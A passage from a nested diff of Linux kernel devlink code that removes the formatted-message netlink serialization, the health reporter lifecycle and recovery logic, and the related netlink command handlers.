+-		return nla_put_u8(skb, attrtype, *(u8 *) msg->value);
+-	case NLA_U32:
+-		return nla_put_u32(skb, attrtype, *(u32 *) msg->value);
+-	case NLA_U64:
+-		return nla_put_u64_64bit(skb, attrtype, *(u64 *) msg->value,
+-					 DEVLINK_ATTR_PAD);
+-	case NLA_NUL_STRING:
+-		return nla_put_string(skb, attrtype, (char *) &msg->value);
+-	case NLA_BINARY:
+-		return nla_put(skb, attrtype, msg->len, (void *) &msg->value);
+-	default:
+-		return -EINVAL;
+-	}
+-}
+-
+-static int
+-devlink_fmsg_prepare_skb(struct devlink_fmsg *fmsg, struct sk_buff *skb,
+-			 int *start)
+-{
+-	struct devlink_fmsg_item *item;
+-	struct nlattr *fmsg_nlattr;
+-	int i = 0;
+-	int err;
+-
+-	fmsg_nlattr = nla_nest_start_noflag(skb, DEVLINK_ATTR_FMSG);
+-	if (!fmsg_nlattr)
+-		return -EMSGSIZE;
+-
+-	list_for_each_entry(item, &fmsg->item_list, list) {
+-		if (i < *start) {
+-			i++;
+-			continue;
+-		}
+-
+-		switch (item->attrtype) {
+-		case DEVLINK_ATTR_FMSG_OBJ_NEST_START:
+-		case DEVLINK_ATTR_FMSG_PAIR_NEST_START:
+-		case DEVLINK_ATTR_FMSG_ARR_NEST_START:
+-		case DEVLINK_ATTR_FMSG_NEST_END:
+-			err = nla_put_flag(skb, item->attrtype);
+-			break;
+-		case DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA:
+-			err = devlink_fmsg_item_fill_type(item, skb);
+-			if (err)
+-				break;
+-			err = devlink_fmsg_item_fill_data(item, skb);
+-			break;
+-		case DEVLINK_ATTR_FMSG_OBJ_NAME:
+-			err = nla_put_string(skb, item->attrtype,
+-					     (char *) &item->value);
+-			break;
+-		default:
+-			err = -EINVAL;
+-			break;
+-		}
+-		if (!err)
+-			*start = ++i;
+-		else
+-			break;
+-	}
+-
+-	nla_nest_end(skb, fmsg_nlattr);
+-	return err;
+-}
+-
+-static int devlink_fmsg_snd(struct devlink_fmsg *fmsg,
+-			    struct genl_info *info,
+-			    enum devlink_command cmd, int flags)
+-{
+-	struct nlmsghdr *nlh;
+-	struct sk_buff *skb;
+-	bool last = false;
+-	int index = 0;
+-	void *hdr;
+-	int err;
+-
+-	while (!last) {
+-		int tmp_index = index;
+-
+-		skb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-		if (!skb)
+-			return -ENOMEM;
+-
+-		hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
+-				  &devlink_nl_family, flags | NLM_F_MULTI, cmd);
+-		if (!hdr) {
+-			err = -EMSGSIZE;
+-			goto nla_put_failure;
+-		}
+-
+-		err = devlink_fmsg_prepare_skb(fmsg, skb, &index);
+-		if (!err)
+-			last = true;
+-		else if (err != -EMSGSIZE || tmp_index == index)
+-			goto nla_put_failure;
+-
+-		genlmsg_end(skb, hdr);
+-		err = genlmsg_reply(skb, info);
+-		if (err)
+-			return err;
+-	}
+-
+-	skb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!skb)
+-		return -ENOMEM;
+-	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			NLMSG_DONE, 0, flags | NLM_F_MULTI);
+-	if (!nlh) {
+-		err = -EMSGSIZE;
+-		goto nla_put_failure;
+-	}
+-
+-	return genlmsg_reply(skb, info);
+-
+-nla_put_failure:
+-	nlmsg_free(skb);
+-	return err;
+-}
+-
+-static int devlink_fmsg_dumpit(struct devlink_fmsg *fmsg, struct sk_buff *skb,
+-			       struct netlink_callback *cb,
+-			       enum devlink_command cmd)
+-{
+-	int index = cb->args[0];
+-	int tmp_index = index;
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(skb, NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
+-			  &devlink_nl_family, NLM_F_ACK | NLM_F_MULTI, cmd);
+-	if (!hdr) {
+-		err = -EMSGSIZE;
+-		goto nla_put_failure;
+-	}
+-
+-	err = devlink_fmsg_prepare_skb(fmsg, skb, &index);
+-	if ((err && err != -EMSGSIZE) || tmp_index == index)
+-		goto nla_put_failure;
+-
+-	cb->args[0] = index;
+-	genlmsg_end(skb, hdr);
+-	return skb->len;
+-
+-nla_put_failure:
+-	genlmsg_cancel(skb, hdr);
+-	return err;
+-}
+-
+-struct devlink_health_reporter {
+-	struct list_head list;
+-	void *priv;
+-	const struct devlink_health_reporter_ops *ops;
+-	struct devlink *devlink;
+-	struct devlink_port *devlink_port;
+-	struct devlink_fmsg *dump_fmsg;
+-	struct mutex dump_lock; /* lock parallel read/write from dump buffers */
+-	u64 graceful_period;
+-	bool auto_recover;
+-	bool auto_dump;
+-	u8 health_state;
+-	u64 dump_ts;
+-	u64 dump_real_ts;
+-	u64 error_count;
+-	u64 recovery_count;
+-	u64 last_recovery_ts;
+-	refcount_t refcount;
+-};
+-
+-void *
+-devlink_health_reporter_priv(struct devlink_health_reporter *reporter)
+-{
+-	return reporter->priv;
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_reporter_priv);
+-
+-static struct devlink_health_reporter *
+-__devlink_health_reporter_find_by_name(struct list_head *reporter_list,
+-				       struct mutex *list_lock,
+-				       const char *reporter_name)
+-{
+-	struct devlink_health_reporter *reporter;
+-
+-	lockdep_assert_held(list_lock);
+-	list_for_each_entry(reporter, reporter_list, list)
+-		if (!strcmp(reporter->ops->name, reporter_name))
+-			return reporter;
+-	return NULL;
+-}
+-
+-static struct devlink_health_reporter *
+-devlink_health_reporter_find_by_name(struct devlink *devlink,
+-				     const char *reporter_name)
+-{
+-	return __devlink_health_reporter_find_by_name(&devlink->reporter_list,
+-						      &devlink->reporters_lock,
+-						      reporter_name);
+-}
+-
+-static struct devlink_health_reporter *
+-devlink_port_health_reporter_find_by_name(struct devlink_port *devlink_port,
+-					  const char *reporter_name)
+-{
+-	return __devlink_health_reporter_find_by_name(&devlink_port->reporter_list,
+-						      &devlink_port->reporters_lock,
+-						      reporter_name);
+-}
+-
+-static struct devlink_health_reporter *
+-__devlink_health_reporter_create(struct devlink *devlink,
+-				 const struct devlink_health_reporter_ops *ops,
+-				 u64 graceful_period, void *priv)
+-{
+-	struct devlink_health_reporter *reporter;
+-
+-	if (WARN_ON(graceful_period && !ops->recover))
+-		return ERR_PTR(-EINVAL);
+-
+-	reporter = kzalloc(sizeof(*reporter), GFP_KERNEL);
+-	if (!reporter)
+-		return ERR_PTR(-ENOMEM);
+-
+-	reporter->priv = priv;
+-	reporter->ops = ops;
+-	reporter->devlink = devlink;
+-	reporter->graceful_period = graceful_period;
+-	reporter->auto_recover = !!ops->recover;
+-	reporter->auto_dump = !!ops->dump;
+-	mutex_init(&reporter->dump_lock);
+-	refcount_set(&reporter->refcount, 1);
+-	return reporter;
+-}
+-
+-/**
+- *	devlink_port_health_reporter_create - create devlink health reporter for
+- *	                                      specified port instance
+- *
+- *	@port: devlink_port which should contain the new reporter
+- *	@ops: ops
+- *	@graceful_period: to avoid recovery loops, in msecs
+- *	@priv: priv
+- */
+-struct devlink_health_reporter *
+-devlink_port_health_reporter_create(struct devlink_port *port,
+-				    const struct devlink_health_reporter_ops *ops,
+-				    u64 graceful_period, void *priv)
+-{
+-	struct devlink_health_reporter *reporter;
+-
+-	mutex_lock(&port->reporters_lock);
+-	if (__devlink_health_reporter_find_by_name(&port->reporter_list,
+-						   &port->reporters_lock, ops->name)) {
+-		reporter = ERR_PTR(-EEXIST);
+-		goto unlock;
+-	}
+-
+-	reporter = __devlink_health_reporter_create(port->devlink, ops,
+-						    graceful_period, priv);
+-	if (IS_ERR(reporter))
+-		goto unlock;
+-
+-	reporter->devlink_port = port;
+-	list_add_tail(&reporter->list, &port->reporter_list);
+-unlock:
+-	mutex_unlock(&port->reporters_lock);
+-	return reporter;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_health_reporter_create);
+-
+-/**
+- *	devlink_health_reporter_create - create devlink health reporter
+- *
+- *	@devlink: devlink
+- *	@ops: ops
+- *	@graceful_period: to avoid recovery loops, in msecs
+- *	@priv: priv
+- */
+-struct devlink_health_reporter *
+-devlink_health_reporter_create(struct devlink *devlink,
+-			       const struct devlink_health_reporter_ops *ops,
+-			       u64 graceful_period, void *priv)
+-{
+-	struct devlink_health_reporter *reporter;
+-
+-	mutex_lock(&devlink->reporters_lock);
+-	if (devlink_health_reporter_find_by_name(devlink, ops->name)) {
+-		reporter = ERR_PTR(-EEXIST);
+-		goto unlock;
+-	}
+-
+-	reporter = __devlink_health_reporter_create(devlink, ops,
+-						    graceful_period, priv);
+-	if (IS_ERR(reporter))
+-		goto unlock;
+-
+-	list_add_tail(&reporter->list, &devlink->reporter_list);
+-unlock:
+-	mutex_unlock(&devlink->reporters_lock);
+-	return reporter;
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_reporter_create);
+-
+-static void
+-devlink_health_reporter_free(struct devlink_health_reporter *reporter)
+-{
+-	mutex_destroy(&reporter->dump_lock);
+-	if (reporter->dump_fmsg)
+-		devlink_fmsg_free(reporter->dump_fmsg);
+-	kfree(reporter);
+-}
+-
+-static void
+-devlink_health_reporter_put(struct devlink_health_reporter *reporter)
+-{
+-	if (refcount_dec_and_test(&reporter->refcount))
+-		devlink_health_reporter_free(reporter);
+-}
+-
+-static void
+-__devlink_health_reporter_destroy(struct devlink_health_reporter *reporter)
+-{
+-	list_del(&reporter->list);
+-	devlink_health_reporter_put(reporter);
+-}
+-
+-/**
+- *	devlink_health_reporter_destroy - destroy devlink health reporter
+- *
+- *	@reporter: devlink health reporter to destroy
+- */
+-void
+-devlink_health_reporter_destroy(struct devlink_health_reporter *reporter)
+-{
+-	struct mutex *lock = &reporter->devlink->reporters_lock;
+-
+-	mutex_lock(lock);
+-	__devlink_health_reporter_destroy(reporter);
+-	mutex_unlock(lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_reporter_destroy);
+-
+-/**
+- *	devlink_port_health_reporter_destroy - destroy devlink port health reporter
+- *
+- *	@reporter: devlink health reporter to destroy
+- */
+-void
+-devlink_port_health_reporter_destroy(struct devlink_health_reporter *reporter)
+-{
+-	struct mutex *lock = &reporter->devlink_port->reporters_lock;
+-
+-	mutex_lock(lock);
+-	__devlink_health_reporter_destroy(reporter);
+-	mutex_unlock(lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_health_reporter_destroy);
+-
+-static int
+-devlink_nl_health_reporter_fill(struct sk_buff *msg,
+-				struct devlink_health_reporter *reporter,
+-				enum devlink_command cmd, u32 portid,
+-				u32 seq, int flags)
+-{
+-	struct devlink *devlink = reporter->devlink;
+-	struct nlattr *reporter_attr;
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto genlmsg_cancel;
+-
+-	if (reporter->devlink_port) {
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, reporter->devlink_port->index))
+-			goto genlmsg_cancel;
+-	}
+-	reporter_attr = nla_nest_start_noflag(msg,
+-					      DEVLINK_ATTR_HEALTH_REPORTER);
+-	if (!reporter_attr)
+-		goto genlmsg_cancel;
+-	if (nla_put_string(msg, DEVLINK_ATTR_HEALTH_REPORTER_NAME,
+-			   reporter->ops->name))
+-		goto reporter_nest_cancel;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_STATE,
+-		       reporter->health_state))
+-		goto reporter_nest_cancel;
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_ERR_COUNT,
+-			      reporter->error_count, DEVLINK_ATTR_PAD))
+-		goto reporter_nest_cancel;
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_RECOVER_COUNT,
+-			      reporter->recovery_count, DEVLINK_ATTR_PAD))
+-		goto reporter_nest_cancel;
+-	if (reporter->ops->recover &&
+-	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD,
+-			      reporter->graceful_period,
+-			      DEVLINK_ATTR_PAD))
+-		goto reporter_nest_cancel;
+-	if (reporter->ops->recover &&
+-	    nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER,
+-		       reporter->auto_recover))
+-		goto reporter_nest_cancel;
+-	if (reporter->dump_fmsg &&
+-	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_DUMP_TS,
+-			      jiffies_to_msecs(reporter->dump_ts),
+-			      DEVLINK_ATTR_PAD))
+-		goto reporter_nest_cancel;
+-	if (reporter->dump_fmsg &&
+-	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_DUMP_TS_NS,
+-			      reporter->dump_real_ts, DEVLINK_ATTR_PAD))
+-		goto reporter_nest_cancel;
+-	if (reporter->ops->dump &&
+-	    nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP,
+-		       reporter->auto_dump))
+-		goto reporter_nest_cancel;
+-
+-	nla_nest_end(msg, reporter_attr);
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-reporter_nest_cancel:
+-	nla_nest_end(msg, reporter_attr);
+-genlmsg_cancel:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_recover_notify(struct devlink_health_reporter *reporter,
+-				   enum devlink_command cmd)
+-{
+-	struct devlink *devlink = reporter->devlink;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
+-	WARN_ON(!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED));
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_health_reporter_fill(msg, reporter, cmd, 0, 0, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
+-				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-void
+-devlink_health_reporter_recovery_done(struct devlink_health_reporter *reporter)
+-{
+-	reporter->recovery_count++;
+-	reporter->last_recovery_ts = jiffies;
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_reporter_recovery_done);
+-
+-static int
+-devlink_health_reporter_recover(struct devlink_health_reporter *reporter,
+-				void *priv_ctx, struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	if (reporter->health_state == DEVLINK_HEALTH_REPORTER_STATE_HEALTHY)
+-		return 0;
+-
+-	if (!reporter->ops->recover)
+-		return -EOPNOTSUPP;
+-
+-	err = reporter->ops->recover(reporter, priv_ctx, extack);
+-	if (err)
+-		return err;
+-
+-	devlink_health_reporter_recovery_done(reporter);
+-	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_HEALTHY;
+-	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
+-
+-	return 0;
+-}
+-
+-static void
+-devlink_health_dump_clear(struct devlink_health_reporter *reporter)
+-{
+-	if (!reporter->dump_fmsg)
+-		return;
+-	devlink_fmsg_free(reporter->dump_fmsg);
+-	reporter->dump_fmsg = NULL;
+-}
+-
+-static int devlink_health_do_dump(struct devlink_health_reporter *reporter,
+-				  void *priv_ctx,
+-				  struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	if (!reporter->ops->dump)
+-		return 0;
+-
+-	if (reporter->dump_fmsg)
+-		return 0;
+-
+-	reporter->dump_fmsg = devlink_fmsg_alloc();
+-	if (!reporter->dump_fmsg) {
+-		err = -ENOMEM;
+-		return err;
+-	}
+-
+-	err = devlink_fmsg_obj_nest_start(reporter->dump_fmsg);
+-	if (err)
+-		goto dump_err;
+-
+-	err = reporter->ops->dump(reporter, reporter->dump_fmsg,
+-				  priv_ctx, extack);
+-	if (err)
+-		goto dump_err;
+-
+-	err = devlink_fmsg_obj_nest_end(reporter->dump_fmsg);
+-	if (err)
+-		goto dump_err;
+-
+-	reporter->dump_ts = jiffies;
+-	reporter->dump_real_ts = ktime_get_real_ns();
+-
+-	return 0;
+-
+-dump_err:
+-	devlink_health_dump_clear(reporter);
+-	return err;
+-}
+-
+-int devlink_health_report(struct devlink_health_reporter *reporter,
+-			  const char *msg, void *priv_ctx)
+-{
+-	enum devlink_health_reporter_state prev_health_state;
+-	struct devlink *devlink = reporter->devlink;
+-	unsigned long recover_ts_threshold;
+-	int ret;
+-
+-	/* write a log message of the current error */
+-	WARN_ON(!msg);
+-	trace_devlink_health_report(devlink, reporter->ops->name, msg);
+-	reporter->error_count++;
+-	prev_health_state = reporter->health_state;
+-	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_ERROR;
+-	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
+-
+-	/* abort if the previous error wasn't recovered */
+-	recover_ts_threshold = reporter->last_recovery_ts +
+-			       msecs_to_jiffies(reporter->graceful_period);
+-	if (reporter->auto_recover &&
+-	    (prev_health_state != DEVLINK_HEALTH_REPORTER_STATE_HEALTHY ||
+-	     (reporter->last_recovery_ts && reporter->recovery_count &&
+-	      time_is_after_jiffies(recover_ts_threshold)))) {
+-		trace_devlink_health_recover_aborted(devlink,
+-						     reporter->ops->name,
+-						     reporter->health_state,
+-						     jiffies -
+-						     reporter->last_recovery_ts);
+-		return -ECANCELED;
+-	}
+-
+-	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_ERROR;
+-
+-	if (reporter->auto_dump) {
+-		mutex_lock(&reporter->dump_lock);
+-		/* store current dump of current error, for later analysis */
+-		devlink_health_do_dump(reporter, priv_ctx, NULL);
+-		mutex_unlock(&reporter->dump_lock);
+-	}
+-
+-	if (!reporter->auto_recover)
+-		return 0;
+-
+-	devl_lock(devlink);
+-	ret = devlink_health_reporter_recover(reporter, priv_ctx, NULL);
+-	devl_unlock(devlink);
+-
+-	return ret;
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_report);
+-
+-static struct devlink_health_reporter *
+-devlink_health_reporter_get_from_attrs(struct devlink *devlink,
+-				       struct nlattr **attrs)
+-{
+-	struct devlink_health_reporter *reporter;
+-	struct devlink_port *devlink_port;
+-	char *reporter_name;
+-
+-	if (!attrs[DEVLINK_ATTR_HEALTH_REPORTER_NAME])
+-		return NULL;
+-
+-	reporter_name = nla_data(attrs[DEVLINK_ATTR_HEALTH_REPORTER_NAME]);
+-	devlink_port = devlink_port_get_from_attrs(devlink, attrs);
+-	if (IS_ERR(devlink_port)) {
+-		mutex_lock(&devlink->reporters_lock);
+-		reporter = devlink_health_reporter_find_by_name(devlink, reporter_name);
+-		if (reporter)
+-			refcount_inc(&reporter->refcount);
+-		mutex_unlock(&devlink->reporters_lock);
+-	} else {
+-		mutex_lock(&devlink_port->reporters_lock);
+-		reporter = devlink_port_health_reporter_find_by_name(devlink_port, reporter_name);
+-		if (reporter)
+-			refcount_inc(&reporter->refcount);
+-		mutex_unlock(&devlink_port->reporters_lock);
+-	}
+-
+-	return reporter;
+-}
+-
+-static struct devlink_health_reporter *
+-devlink_health_reporter_get_from_info(struct devlink *devlink,
+-				      struct genl_info *info)
+-{
+-	return devlink_health_reporter_get_from_attrs(devlink, info->attrs);
+-}
+-
+-static struct devlink_health_reporter *
+-devlink_health_reporter_get_from_cb(struct netlink_callback *cb)
+-{
+-	const struct genl_dumpit_info *info = genl_dumpit_info(cb);
+-	struct devlink_health_reporter *reporter;
+-	struct nlattr **attrs = info->attrs;
+-	struct devlink *devlink;
+-
+-	devlink = devlink_get_from_attrs(sock_net(cb->skb->sk), attrs);
+-	if (IS_ERR(devlink))
+-		return NULL;
+-
+-	reporter = devlink_health_reporter_get_from_attrs(devlink, attrs);
+-	devlink_put(devlink);
+-	return reporter;
+-}
+-
+-void
+-devlink_health_reporter_state_update(struct devlink_health_reporter *reporter,
+-				     enum devlink_health_reporter_state state)
+-{
+-	if (WARN_ON(state != DEVLINK_HEALTH_REPORTER_STATE_HEALTHY &&
+-		    state != DEVLINK_HEALTH_REPORTER_STATE_ERROR))
+-		return;
+-
+-	if (reporter->health_state == state)
+-		return;
+-
+-	reporter->health_state = state;
+-	trace_devlink_health_reporter_state_update(reporter->devlink,
+-						   reporter->ops->name, state);
+-	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_reporter_state_update);
+-
+-static int devlink_nl_cmd_health_reporter_get_doit(struct sk_buff *skb,
+-						   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg) {
+-		err = -ENOMEM;
+-		goto out;
+-	}
+-
+-	err = devlink_nl_health_reporter_fill(msg, reporter,
+-					      DEVLINK_CMD_HEALTH_REPORTER_GET,
+-					      info->snd_portid, info->snd_seq,
+-					      0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		goto out;
+-	}
+-
+-	err = genlmsg_reply(msg, info);
+-out:
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-static int
+-devlink_nl_cmd_health_reporter_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink_health_reporter *reporter;
+-	struct devlink_port *port;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		mutex_lock(&devlink->reporters_lock);
+-		list_for_each_entry(reporter, &devlink->reporter_list,
+-				    list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_health_reporter_fill(
+-				msg, reporter, DEVLINK_CMD_HEALTH_REPORTER_GET,
+-				NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
+-				NLM_F_MULTI);
+-			if (err) {
+-				mutex_unlock(&devlink->reporters_lock);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		mutex_unlock(&devlink->reporters_lock);
+-		devlink_put(devlink);
+-	}
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(port, &devlink->port_list, list) {
+-			mutex_lock(&port->reporters_lock);
+-			list_for_each_entry(reporter, &port->reporter_list, list) {
+-				if (idx < start) {
+-					idx++;
+-					continue;
+-				}
+-				err = devlink_nl_health_reporter_fill(
+-					msg, reporter,
+-					DEVLINK_CMD_HEALTH_REPORTER_GET,
+-					NETLINK_CB(cb->skb).portid,
+-					cb->nlh->nlmsg_seq, NLM_F_MULTI);
+-				if (err) {
+-					mutex_unlock(&port->reporters_lock);
+-					devl_unlock(devlink);
+-					devlink_put(devlink);
+-					goto out;
+-				}
+-				idx++;
+-			}
+-			mutex_unlock(&port->reporters_lock);
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int
+-devlink_nl_cmd_health_reporter_set_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	if (!reporter->ops->recover &&
+-	    (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD] ||
+-	     info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER])) {
+-		err = -EOPNOTSUPP;
+-		goto out;
+-	}
+-	if (!reporter->ops->dump &&
+-	    info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP]) {
+-		err = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD])
+-		reporter->graceful_period =
+-			nla_get_u64(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD]);
+-
+-	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER])
+-		reporter->auto_recover =
+-			nla_get_u8(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER]);
+-
+-	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP])
+-		reporter->auto_dump =
+-		nla_get_u8(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP]);
+-
+-	devlink_health_reporter_put(reporter);
+-	return 0;
+-out:
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_health_reporter_recover_doit(struct sk_buff *skb,
+-						       struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	err = devlink_health_reporter_recover(reporter, NULL, info->extack);
+-
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_health_reporter_diagnose_doit(struct sk_buff *skb,
+-							struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-	struct devlink_fmsg *fmsg;
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	if (!reporter->ops->diagnose) {
+-		devlink_health_reporter_put(reporter);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	fmsg = devlink_fmsg_alloc();
+-	if (!fmsg) {
+-		devlink_health_reporter_put(reporter);
+-		return -ENOMEM;
+-	}
+-
+-	err = devlink_fmsg_obj_nest_start(fmsg);
+-	if (err)
+-		goto out;
+-
+-	err = reporter->ops->diagnose(reporter, fmsg, info->extack);
+-	if (err)
+-		goto out;
+-
+-	err = devlink_fmsg_obj_nest_end(fmsg);
+-	if (err)
+-		goto out;
+-
+-	err = devlink_fmsg_snd(fmsg, info,
+-			       DEVLINK_CMD_HEALTH_REPORTER_DIAGNOSE, 0);
+-
+-out:
+-	devlink_fmsg_free(fmsg);
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-static int
+-devlink_nl_cmd_health_reporter_dump_get_dumpit(struct sk_buff *skb,
+-					       struct netlink_callback *cb)
+-{
+-	struct devlink_health_reporter *reporter;
+-	u64 start = cb->args[0];
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_cb(cb);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	if (!reporter->ops->dump) {
+-		err = -EOPNOTSUPP;
+-		goto out;
+-	}
+-	mutex_lock(&reporter->dump_lock);
+-	if (!start) {
+-		err = devlink_health_do_dump(reporter, NULL, cb->extack);
+-		if (err)
+-			goto unlock;
+-		cb->args[1] = reporter->dump_ts;
+-	}
+-	if (!reporter->dump_fmsg || cb->args[1] != reporter->dump_ts) {
+-		NL_SET_ERR_MSG_MOD(cb->extack, "Dump trampled, please retry");
+-		err = -EAGAIN;
+-		goto unlock;
+-	}
+-
+-	err = devlink_fmsg_dumpit(reporter->dump_fmsg, skb, cb,
+-				  DEVLINK_CMD_HEALTH_REPORTER_DUMP_GET);
+-unlock:
+-	mutex_unlock(&reporter->dump_lock);
+-out:
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-static int
+-devlink_nl_cmd_health_reporter_dump_clear_doit(struct sk_buff *skb,
+-					       struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	if (!reporter->ops->dump) {
+-		devlink_health_reporter_put(reporter);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	mutex_lock(&reporter->dump_lock);
+-	devlink_health_dump_clear(reporter);
+-	mutex_unlock(&reporter->dump_lock);
+-	devlink_health_reporter_put(reporter);
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_health_reporter_test_doit(struct sk_buff *skb,
+-						    struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	if (!reporter->ops->test) {
+-		devlink_health_reporter_put(reporter);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	err = reporter->ops->test(reporter, info->extack);
+-
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-struct devlink_stats {
+-	u64_stats_t rx_bytes;
+-	u64_stats_t rx_packets;
+-	struct u64_stats_sync syncp;
+-};
+-
+-/**
+- * struct devlink_trap_policer_item - Packet trap policer attributes.
+- * @policer: Immutable packet trap policer attributes.
+- * @rate: Rate in packets / sec.
+- * @burst: Burst size in packets.
+- * @list: trap_policer_list member.
+- *
+- * Describes packet trap policer attributes. Created by devlink during trap
+- * policer registration.
+- */
+-struct devlink_trap_policer_item {
+-	const struct devlink_trap_policer *policer;
+-	u64 rate;
